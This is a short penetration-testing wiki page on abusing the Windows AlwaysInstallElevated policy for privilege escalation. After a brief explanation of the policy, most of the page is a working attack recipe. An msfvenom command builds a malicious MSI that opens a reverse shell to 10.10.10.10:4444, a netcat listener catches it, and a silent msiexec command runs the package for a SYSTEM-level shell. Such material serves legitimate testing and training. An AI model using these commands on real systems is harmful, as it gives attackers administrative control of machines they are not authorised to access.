search
TwitterGithubLinkedinInstagramDiscord
githubEdit

Always Install Elevated

hashtag
Overview

The Always Install Elevated policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.

hashtag
How It Works

When the Always Install Elevated setting is enabled, the following occurs:

  1. Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.

  2. UAC Bypass: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software.

hashtag
Creating and Executing a Malicious MSI Package for Reverse Shell Access

  1. Generate the Malicious MSI Package:

    • Use msfvenom to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to 10.10.10.10, and the local port (LPORT) is set to 4444.

    • The command to generate the MSI package is as follows:

      dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi

  2. Transfer the MSI File:

    • After generating the dbs.msi file, transfer it to the target machine where you want to execute it.

  3. Set Up a Netcat Listener:

    • On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:

      nc -lnvp 4444

  4. Execute the MSI Package:

    • On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:

      C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart

After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with system privileges.

PreviousServer OperatorsNextPrint Operators

Last updated